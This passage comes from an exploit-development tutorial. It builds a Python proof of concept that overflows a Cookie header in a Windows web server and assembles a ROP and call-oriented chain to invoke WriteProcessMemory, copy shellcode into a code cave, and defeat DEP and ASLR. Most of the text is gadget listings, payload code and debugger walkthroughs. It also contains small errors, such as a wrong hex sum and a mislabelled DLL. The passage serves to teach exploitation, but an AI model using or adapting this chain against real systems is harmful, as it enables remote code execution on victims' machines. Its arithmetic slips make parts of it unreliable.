http_request += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
http_request += "Accept-Language: en-US,en;q=0.5\r\n"
http_request += "Accept-Encoding: gzip, deflate\r\n"
http_request += "Referer: http://172.16.55.140/\r\n"
http_request += "Cookie: SESSIONID=9349; UserID=" + crash + "; PassWD=;\r\n"
http_request += "Connection: Close\r\n"
http_request += "Upgrade-Insecure-Requests: 1\r\n"

print "[+] Sending exploit..."
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.130", 80))
s.send(http_request)
s.close()

The above PoC places the parameters on the stack and also performs a “jump” over them with add esp, 0x1C. Let’s examine this in the debugger.

The following is the state of the stack - with the kernel32!WriteProcessMemory parameters outlined in red.

The address 0x10015eb4 is a ROP gadget that will add to ESP. After this gadget is executed, we can see the stack moves further down.

We can see that we have moved further into our buffer, where our future ROP gadgets will reside. The parameters for the function call are now “behind” where program execution is - meaning we will not inadvertently corrupt these parameters because they are not within the current execution flow.

Now that this is out of the way - we can “officially” begin our ROP chain to obtain code execution.

lpBuffer

The first thing that we will do is get the lpBuffer parameter, which will contain the pointer to the base of our shellcode, situated. Recall that kernel32!WriteProcessMemory will take in a source buffer and write it somewhere else. Since we have control of the stack, we will just preemptively place our shellcode there. This is where the headache of storing an address near the stack in EAX and ECX will come into play.

As it currently stands, ECX is 0x18 bytes behind the parameter placeholder for lpBuffer.

The goal right now is to increase ECX by 0x18 bytes. Here is the reason for this.

Let’s say we get the parameter placeholder’s location (e.g. the virtual memory address, not the 0x11111111 itself) in ECX (which we will). If we were to read the value of ECX, we would be reading the value 0x2826930. However, if we read the value of dword ptr [ecx] instead - we would be reading the actual value of 0x11111111.

The first part of the image above shows the value of the address itself. The second part of the image shows what happens when we “dereference” (using poi in WinDbg), or extract the value a memory address is pointing to. We can leverage this, by using an arbitrary write primitive. When we get the address of the lpBuffer parameter into ECX - we then will not overwrite ECX, but rather dword ptr [ecx] - which will force the address on the stack (which contains the parameter placeholder) to point to something other than 0x11111111.

Remember - every time the process is terminated and restarted - the virtual memory on the stack changes. This is why we need to dynamically resolve this parameter, instead of hardcoding an address.

We will use the following ROP gadgets, in order to make ECX contain the stack address holding the lpBuffer parameter placeholder.

crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)

Two things about the above ROP gadgets. First, the clc instruction.

clc is an assembly instruction that clears the “carry” flag (the CF register). None of our ROP gadgets, now or later, depend on the state of this flag - so it is okay that this instruction resides in this gadget. Additionally, we have a mov edx, dword [ecx-0x4] instruction. Currently, we are not using the EDX register for anything - so this instruction will not consequently disrupt what we are trying to achieve.

Also notably, this set of ROP gadgets only increases ECX by 16 decimal bytes (0x10 hexadecimal) - even though the parameter placeholder for lpBuffer is located 0x18 bytes away (24 decimal bytes).

This is again a “preparatory” procedure for our future ROP gadgets. We need a gadget, similar to the following: mov dword ptr [ecx], reg, where reg refers to any register that contains the stack address of our shellcode and dword ptr [ecx] contains the stack address which is currently serving as the parameter placeholder for lpBuffer. This will essentially take what ECX is pointing to, which is 0x11111111, and overwrite the pointer with the actual address of our shellcode.

However, there were no such gadgets that were found easily in the process memory. The closest gadget was mov dword ptr [ecx+0x8], eax. Knowing this, we will only raise ECX to 0x10 instead of 0x18 - due to the gadget overwriting ECX’s pointer at an offset of 0x8 (0x18 - 0x10 = 0x8).

The key is now to give some padding between the space on the stack for our future ROP gadgets and our shellcode. To do this, we will provide approximately 0x300 bytes of space on the stack for remaining ROP gadgets. This will allow us to “simulate” the rest of our ROP gadgets and choose a place on the stack that our shellcode will go, and start performing these calculations now. Think of these 0x300 bytes as “ROP gadget placeholders”. If perhaps we would need more than 0x300 bytes, due to more ROP gadgets needed than anticipated, we would move our shellcode down lower. We will “aim” for 0x300 bytes down the stack, and we will add NOPs to compensate for any of the unused 0x300 bytes (if necessary). The following ROP gadgets can accomplish loading the location of our “shellcode” (future shellcode) into EAX.

crash += struct.pack('<L', 0x1001fce9)    # pop esi ; add esp + 0x8 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0xfffffd44)    # Shellcode is about negative 0xfffffd44 (0x2dc) bytes away from EAX
crash += struct.pack('<L', 0x90909090)    # Compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Compensate for above ROP gadget
crash += struct.pack('<L', 0x10022f45)    # sub eax, esi ; pop edi ; pop esi ; ret
crash += struct.pack('<L', 0x90909090)    # Compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Compensate for above ROP gadget

The location where our shellcode will be (your location can be different, depending on how far down the stack you wish to place it) is 0x2dc bytes away from the value in EAX. To load our shellcode value into EAX, we need to increase it by 0x2dc bytes. Obviously, this is too much for just consecutive inc eax gadgets. Additionally, if we directly add to EAX - the NULL byte problem would kill our exploit. This is because a 32-bit register, like EAX, needs the value 0x000002dc to completely fill its contents. To address this, we can use negative numbers and subtraction to yield the same result!

The negative representation of 0x2dc will be loaded into ESI. We will then need to also compensate for the add esp + 0x8 instruction. To do this, we will add 0x8 bytes of padding so no gadgets get “jumped over”. Then, we will subtract the value in ESI from EAX - and place the difference in EAX. This will result in the address of where our shellcode will go being placed into EAX. Additionally, we need compensate for two pop gadgets.

Let’s view the ROP routine in WinDbg. Program execution reaches our ECX manipulating gadget(s).

Stepping through the 16 gadgets, ECX is now 8 bytes behind the lpBuffer parameter - as expected.

Program execution then redirects to the EAX manipulation routine.

The intended negative value of 0x2dc is placed into ESI.

The value is then subtracted and the difference is placed in EAX! We have successfully loaded the address of where our shellcode will go, further down the stack, into EAX.

Note, the address where our shellcode will go is denoted with NOPs in the above image for visual effect. This was done in the debugger to outline the process taken here.

The last step is to utilize the following ROP gadget to change the lpBuffer parameter placeholder to point to the legitimate parameter (which is the shellcode location down the stack).

crash += struct.pack('<L', 0x10021bfb)    # mov dword [ecx+0x8], eax ; ret: ImageLoad.dll (non-ASLR enabled module)

Program execution reaches the gadget in question.

As we can already see from the image above, 0x11111111 (which is the parameter placeholder for lpBuffer), is going to be what is overwritten with the contents of EAX (which contains the stack address which points to our shellcode.

State of the lpBuffer parameter placeholder before the instruction is stepped through.

After stepping through the instruction - we can see the lpBuffer parameter placeholder has been dynamically changed to the correct address!

nSize

nSize, as you can recall from earlier, refers to the size of our region of memory we would like written in the process space. We would like the size of our shellcode to be about 0x180 bytes (384 decimal) - as this is more than enough for any type of shellcode.

Since ECX and EAX are being used for stack addresses - let’s use another register for this parameter. Let’s use EDX.

Parsing the application for gadgets, there is a nice one for adding directly to EDX in multiples of 0x20.

crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)

Although the gadget is very nice, as we just need to add to EDX until the value of 0x180 is placed in it, the gadget doesn’t end with a ret - meaning it will not return back to the stack and pick up the next gadget.

Instead, this gadget performs a call edi instruction. This, at first glance - will completely kill our ROP chain, as execution will not redirect back to the stack. However, there is a way around this - with a technique called Call-oriented Programming (COP).

Essentially, since we know that EDI will be called, we could pop a ROP gadget, which would perform an add esp, X ; ret. Why add, esp X you may ask?

As you may, or may not, know - when a call instruction is executed - it pushes its return address onto the stack. This is done so the caller knows where to return after it is done executing. However, we can just execute an add esp X gadget to jump over this return address and back into our ROP chain. However, there is one more thing that we need to take into account from our gadget, and that is push edx.

This will push the EDX register onto the stack before the call instruction pushes its return address onto the stack - meaning a total of 0x8 (2 DWORDS) bytes will be pushed onto the stack. To compensate for this, we will load an add esp, 0x8 ; ret.

Here is how our routine of gadgets will look, in totality.

crash += struct.pack('<L', 0x100103ff)    # pop edi ; ret: ImageLoad.dll (non-ASLR enabled module) (Compensation for COP gadget add edx, 0x20)
crash += struct.pack('<L', 0x1001c31e)    # add esp, 0x8 ; ret: ImageLoadl.dll (non-ASLR enabled module) (Returns to stack after COP gadget)
crash += struct.pack('<L', 0x10022c4c)    # xor edx, edx ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)

Let’s view this all in the debugger.

First, program execution hits our pop edi instruction, which will load the “return to the stack” ROP gadget into EDI.

pop edi places the instruction into EDI.

The next gadget is hit, which will set EDX to zero so we can start with a “clean slate”.

Now, program execution is ready for the add edx, 0x20 gadget - which will be repeated until EDX has been filled with 0x180.

push edx is then executed, resulting in EDX being placed onto the stack.

call edi is now about to be executed. Stepping through the instruction, with t in WinDbg, pushes the caller’s return address onto the stack.

Our add esp, 0x8 routine is queued up for execution, and successfully returns us back to the stack - where the exact same routine will be repeated until 0x180 is placed into EDX.

After repeating the routine, EDX now contains 0x180.

Now that EDX contains our intended value of 0x180, we can eventually use the same mov dword ptr [reg], edx primitive to overwrite the nSize parameter placeholder with out intended value of 0x180.

We used the ECX register, which currently still contains the address on the stack that holds the now correct lpBuffer size parameter - 0x8 (remember, ECX was used at an offset of 0x8 last time, meaning it is technically 0x8 bytes behind the lpBuffer parameter, which is 4 bytes behind the nSize parameter placeholder - for a total of 0xC bytes, or 12 decimal bytes).

As you can see, 0x4 bytes after lpBuffer comes the nSize parameter (as denoted by 0x22222222).

Utilizing the same gadgets from a previous ROP routine - we can increase ECX by 12 (0xC) decimal bytes, to load the parameter placeholder address for nSize.

crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)

It should also be noted, that after each of these ROP gadgets are executed - the AL register will be increased by 0x39 bytes. We will compensate for this in the future. Since AL only makes up the lower 8 bits of the EAX register, this will not have much of an adverse effect on what we are trying to accomplish.

The state of the registers before execution can be seen below.

ECX, after the ROP gadgets are executed, is loaded with the address for the nSize parameter placeholder.

A nice gadget can be found, after parsing the PE, to overwrite the parameter placeholder with the legitimate parameter.

crash += struct.pack('<L', 0x1001f5b4)    # mov dword ptr [ecx], edx

The state of the parameters before the overwrite occurs can be seen below.

As we can see, the junk 0x22222222 parameter will be the target for the overwrite.

Stepping through the instruction, we have dynamically changed the parameter placeholder for nSize to the legitimate parameter!

kernel32!WriteProcessMemory

Perfect! All that is left now is to is extract our current pointer to kernel32.dll and calculate the offset between kernel32WriteFileImplementation and kernel32!WriteProcessMemory. After this, we will use the same primitive of dynamically manipulating the kernel32WriteProcessMemory parameter placeholder to point to the actual API.

Currently. ECX (the register we have been leveraging for each of the arbitrary writes to overwrite function parameter placeholders), is 0x14 (20 decimal) bytes away from the kernel32!WriteProcessMemory parameter placeholder.

Knowing this, we will prepare another arbitrary write by decrementing ECX by 0x14 bytes.

crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)

Once the ROP gadgets have executed, ECX now contains the same address as the parameter placeholder for kernel32!WriteProcessMemory.

The goal now is to dereference the kernel32!WriteProcessMemory parameter placeholder and place it in a CPU register we have control over.

Since ECX is reserved for the arbitrary write, we will use EAX to also store the kernel32!WriteProcessMemory parameter placeholder.

Recall that EDX still contains a value of 0x180, from the nSize parameter. After all, we have not manipulated EDX since. Conveniently, the current distance between the address within EAX and the kernel32!WriteProcessMemory parameter placeholder is 0x260.

Since we already have a routine of ROP and COP gadgets that increases EDX 0x180 bytes, we can utilize the EXACT same routine to increase it another 0x180 bytes - which will give us a value of 0x260! Once EDX contains the value of 0x260, we can subtract it from EAX and place the difference in EAX. This will allow us to store the kernel32!WriteProcessMemory parameter placholder in EAX. This time, however, since EDI already contains the old “return to the stack” routine - we can just directly add to EDX.

crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)

After the add edx COP gadgets execute, EDX contains the distance between the kernel32!WriteProcessMemory and EAX (which is 0x260).

After the COP gadgets execute, the sub eax, edx ; ret gadget takes over execution - resulting in EAX now containing the address of the kernel32!WriteProcessMemory parameter placeholder.

So currently, as it stands, the stack address of 0x2636920, which changes when the process restarts, points to 0x61c832e4 - which then points to the kernel32.dll address. This means we have a pointer to a pointer to the pointer we would like to extract. Knowing this, we will dereference 0x2636920 and store the result (which is 0x61c832e4) into EAX. Then, utilizing the exact same routine, we will dereference 0x61c832e4 (which is a pointer to kernel32!WriteFileImplementation) and store the result in EAX. We can achieve this with two ROP gadgets.

crash += struct.pack('<L', 0x1002248c)    # mov eax, dword [eax] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1002248c)    # mov eax, dword [eax] ; ret: ImageLoad.dll (non-ASLR enabled module)

Program execution hits the first gadget, where WinDbg shows us what will be placed in EAX (0x61c832e4).

Utilizing the same ROP gadget, we successfully extract a pointer to kernel32.dll into EAX - dynamically!

This is great news. We have defeated ASLR on the system itself. What needs to happen now is that we need to find the offset between kernel32!WriteProcessMemory and kernel32WriteFileImplementation. To do this, we can use WinDbg.

Great! The distance between the two functions is 0xfffaca4d (remember, to avoid NULL bytes - we use the negative distance).

However, if we subtract these two values - it seems as though there is an issue and kernel32!WriteProcessMemory is not extracted properly.

Instead of fighting with two’s complement math - let’s just use a different function from the IAT. Preferably, let’s find a function that is less than in value, in terms of the virtual address, than kernel32!WriteProcessMemory.

Looking at the IAT for ImageLoad, we can see there is a nice IAT entry that points to kernel32!GetStartupInfoA.

Subtracting the two functions results in a value of 0xfffffd2d - and also yields our desired output!

Now that we have solved this issue, let’s show the full PoC up until this point.

import sys
import os
import socket
import struct

# 4063 byte SEH offset
# Stack pivot lands at padding buffer to SEH at offset 2563
crash = "\x90" * 2563

# Stack pivot lands here
# Beginning ROP chain


# Saving address near ESP for relative calculations into EAX and ECX
# EBP is near stack address
crash += struct.pack('<L', 0x61c05e8c)    # xchg eax, ebp ; ret: sqlite3.dll (non-ASLR enabled module)

# EAX is now 0xfec bytes away from ESP. We want current ESP + 0x28 (to compensate for loading EAX into ECX eventually) into EAX
# Popping negative ESP + 0x28 into ECX and subtracting from EAX
# EAX will now contain a value at ESP + 0x24 (loading ESP + 0x24 into EAX, as this value will be placed in EBP eventually. EBP will then be placed into ESP - which will compensate for ROP gadget which moves EAX into EAX via "leave")
crash += struct.pack('<L', 0x10018606)    # pop ecx, ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0xffffefe0)    # Negative ESP + 0x28 offset
crash += struct.pack('<L', 0x1001283e)    # sub eax, ecx ; ret: ImageLoad.dll (non-ASLR enabled module)

# This gadget is to get EBP equal to EAX (which is further down on the stack) - due to the mov eax, ecx ROP gadget that eventually will occur.
# Said ROP gadget has a "leave" instruction, which will load EBP into ESP. This ROP gadget compensates for this gadget to make sure the stack doesn't get corrupted, by just "hopping" down the stack
# EAX and ECX will now equal ESP - 8 - which is good enough in terms of needing EAX and ECX to be "values around the stack"
crash += struct.pack('<L', 0x61c30547)    # add ebp, eax ; ret sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c6588d)    # mov ecx, eax ; mov eax, ecx ; add esp, 0x24 ; pop ebx ; leave ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget (pop ebx)
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget (pop ebp in leave instruction)

# Jumping over kernel32!WriteProcessMemory placeholder parameters
crash += struct.pack('<L', 0x10015eb4)    # add esp, 0x1c ; ret: ImageLoad.dll (non-ASLR enabled module)

# kernel32!WriteProcessMemory placeholder parameters
crash += struct.pack('<L', 0x1004d1ec)    # Pointer to kernel32!GetStartupInfoA (no pointers from IAT directly to kernel32!WriteProcessMemory, so loading pointer to kernel32.dll and compensating later.)
crash += struct.pack('<L', 0x61c72530)    # Return address parameter placeholder (where function will jump to after execution - which is where shellcode will be written to. This is an executable code cave in the .text section of sqlite3.dll)
crash += struct.pack('<L', 0xFFFFFFFF)    # hProccess = handle to current process (Pseudo handle = 0xFFFFFFFF points to current process)
crash += struct.pack('<L', 0x61c72530)    # lpBaseAddress = pointer to where shellcode will be written to. (0x61C72530 is an executable code cave in the .text section of sqlite3.dll) 
crash += struct.pack('<L', 0x11111111)    # lpBuffer = base address of shellcode (dynamically generated)
crash += struct.pack('<L', 0x22222222)    # nSize = size of shellcode 
crash += struct.pack('<L', 0x1004D740)    # lpNumberOfBytesWritten = writable location (.idata section of ImageLoad.dll address in a code cave)

# Starting with lpBuffer (shellcode location)
# ECX currently points to lpBuffer placeholder parameter location - 0x18
# Moving ECX 8 bytes before EAX, as the gadget to overwrite dword ptr [ecx] overwrites it at an offset of ecx+0x8
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
